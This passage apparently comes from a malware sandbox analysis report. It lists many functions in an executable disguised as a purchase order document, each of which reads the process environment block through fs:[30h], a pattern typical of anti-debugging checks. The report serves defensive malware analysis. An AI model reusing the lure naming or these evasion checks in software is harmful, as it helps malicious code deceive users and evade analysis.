      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821460 mov eax, dword ptr fs:[00000030h]11_2_34821460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F460 mov eax, dword ptr fs:[00000030h]11_2_3483F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F460 mov eax, dword ptr fs:[00000030h]11_2_3483F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F460 mov eax, dword ptr fs:[00000030h]11_2_3483F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F460 mov eax, dword ptr fs:[00000030h]11_2_3483F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F460 mov eax, dword ptr fs:[00000030h]11_2_3483F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F460 mov eax, dword ptr fs:[00000030h]11_2_3483F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F547F mov eax, dword ptr fs:[00000030h]11_2_348F547F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481758F mov eax, dword ptr fs:[00000030h]11_2_3481758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481758F mov eax, dword ptr fs:[00000030h]11_2_3481758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481758F mov eax, dword ptr fs:[00000030h]11_2_3481758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AB594 mov eax, dword ptr fs:[00000030h]11_2_348AB594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AB594 mov eax, dword ptr fs:[00000030h]11_2_348AB594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415A9 mov eax, dword ptr fs:[00000030h]11_2_348415A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415A9 mov eax, dword ptr fs:[00000030h]11_2_348415A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415A9 mov eax, dword ptr fs:[00000030h]11_2_348415A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415A9 mov eax, dword ptr fs:[00000030h]11_2_348415A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415A9 mov eax, dword ptr fs:[00000030h]11_2_348415A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B35BA mov eax, dword ptr fs:[00000030h]11_2_348B35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B35BA mov eax, dword ptr fs:[00000030h]11_2_348B35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B35BA mov eax, dword ptr fs:[00000030h]11_2_348B35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348B35BA mov eax, dword ptr fs:[00000030h]11_2_348B35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF5BE mov eax, dword ptr fs:[00000030h]11_2_348DF5BE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348BD5B0 mov eax, dword ptr fs:[00000030h]11_2_348BD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348BD5B0 mov eax, dword ptr fs:[00000030h]11_2_348BD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348555C0 mov eax, dword ptr fs:[00000030h]11_2_348555C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F55C9 mov eax, dword ptr fs:[00000030h]11_2_348F55C9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F35D7 mov eax, dword ptr fs:[00000030h]11_2_348F35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F35D7 mov eax, dword ptr fs:[00000030h]11_2_348F35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F35D7 mov eax, dword ptr fs:[00000030h]11_2_348F35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D5D0 mov eax, dword ptr fs:[00000030h]11_2_3489D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D5D0 mov ecx, dword ptr fs:[00000030h]11_2_3489D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348495DA mov eax, dword ptr fs:[00000030h]11_2_348495DA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34857505 mov eax, dword ptr fs:[00000030h]11_2_34857505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34857505 mov ecx, dword ptr fs:[00000030h]11_2_34857505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DB52F mov eax, dword ptr fs:[00000030h]11_2_348DB52F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485D530 mov eax, dword ptr fs:[00000030h]11_2_3485D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485D530 mov eax, dword ptr fs:[00000030h]11_2_3485D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5537 mov eax, dword ptr fs:[00000030h]11_2_348F5537
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB550 mov eax, dword ptr fs:[00000030h]11_2_348CB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB550 mov eax, dword ptr fs:[00000030h]11_2_348CB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB550 mov eax, dword ptr fs:[00000030h]11_2_348CB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485B570 mov eax, dword ptr fs:[00000030h]11_2_3485B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485B570 mov eax, dword ptr fs:[00000030h]11_2_3485B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D6AA mov eax, dword ptr fs:[00000030h]11_2_3481D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D6AA mov eax, dword ptr fs:[00000030h]11_2_3481D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348176B2 mov eax, dword ptr fs:[00000030h]11_2_348176B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348176B2 mov eax, dword ptr fs:[00000030h]11_2_348176B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348176B2 mov eax, dword ptr fs:[00000030h]11_2_348176B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348516CF mov eax, dword ptr fs:[00000030h]11_2_348516CF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF6C7 mov eax, dword ptr fs:[00000030h]11_2_348DF6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D6E0 mov eax, dword ptr fs:[00000030h]11_2_3484D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D6E0 mov eax, dword ptr fs:[00000030h]11_2_3484D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348536EF mov eax, dword ptr fs:[00000030h]11_2_348536EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DD6F0 mov eax, dword ptr fs:[00000030h]11_2_348DD6F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34851607 mov eax, dword ptr fs:[00000030h]11_2_34851607
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485F603 mov eax, dword ptr fs:[00000030h]11_2_3485F603
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823616 mov eax, dword ptr fs:[00000030h]11_2_34823616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823616 mov eax, dword ptr fs:[00000030h]11_2_34823616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5636 mov eax, dword ptr fs:[00000030h]11_2_348F5636
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34859660 mov eax, dword ptr fs:[00000030h]11_2_34859660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34859660 mov eax, dword ptr fs:[00000030h]11_2_34859660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348BD660 mov eax, dword ptr fs:[00000030h]11_2_348BD660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF78A mov eax, dword ptr fs:[00000030h]11_2_348DF78A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A97A9 mov eax, dword ptr fs:[00000030h]11_2_348A97A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D7B0 mov eax, dword ptr fs:[00000030h]11_2_3484D7B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F37B6 mov eax, dword ptr fs:[00000030h]11_2_348F37B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348257C0 mov eax, dword ptr fs:[00000030h]11_2_348257C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348257C0 mov eax, dword ptr fs:[00000030h]11_2_348257C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348257C0 mov eax, dword ptr fs:[00000030h]11_2_348257C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D7E0 mov ecx, dword ptr fs:[00000030h]11_2_3482D7E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348217EC mov eax, dword ptr fs:[00000030h]11_2_348217EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348217EC mov eax, dword ptr fs:[00000030h]11_2_348217EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348217EC mov eax, dword ptr fs:[00000030h]11_2_348217EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34825702 mov eax, dword ptr fs:[00000030h]11_2_34825702
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34825702 mov eax, dword ptr fs:[00000030h]11_2_34825702
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827703 mov eax, dword ptr fs:[00000030h]11_2_34827703
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485F71F mov eax, dword ptr fs:[00000030h]11_2_3485F71F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485F71F mov eax, dword ptr fs:[00000030h]11_2_3485F71F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823720 mov eax, dword ptr fs:[00000030h]11_2_34823720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F720 mov eax, dword ptr fs:[00000030h]11_2_3483F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F720 mov eax, dword ptr fs:[00000030h]11_2_3483F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F720 mov eax, dword ptr fs:[00000030h]11_2_3483F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF72E mov eax, dword ptr fs:[00000030h]11_2_348DF72E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E972B mov eax, dword ptr fs:[00000030h]11_2_348E972B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819730 mov eax, dword ptr fs:[00000030h]11_2_34819730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819730 mov eax, dword ptr fs:[00000030h]11_2_34819730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34855734 mov eax, dword ptr fs:[00000030h]11_2_34855734
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov ecx, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F3749 mov eax, dword ptr fs:[00000030h]11_2_348F3749
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C375F mov eax, dword ptr fs:[00000030h]11_2_348C375F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481B765 mov eax, dword ptr fs:[00000030h]11_2_3481B765
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AD080 mov eax, dword ptr fs:[00000030h]11_2_348AD080
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AD080 mov eax, dword ptr fs:[00000030h]11_2_348AD080
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D08D mov eax, dword ptr fs:[00000030h]11_2_3481D08D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34825096 mov eax, dword ptr fs:[00000030h]11_2_34825096
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D090 mov eax, dword ptr fs:[00000030h]11_2_3484D090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D090 mov eax, dword ptr fs:[00000030h]11_2_3484D090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485909C mov eax, dword ptr fs:[00000030h]11_2_3485909C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D0C0 mov eax, dword ptr fs:[00000030h]11_2_3489D0C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D0C0 mov eax, dword ptr fs:[00000030h]11_2_3489D0C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F50D9 mov eax, dword ptr fs:[00000030h]11_2_348F50D9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348490DB mov eax, dword ptr fs:[00000030h]11_2_348490DB
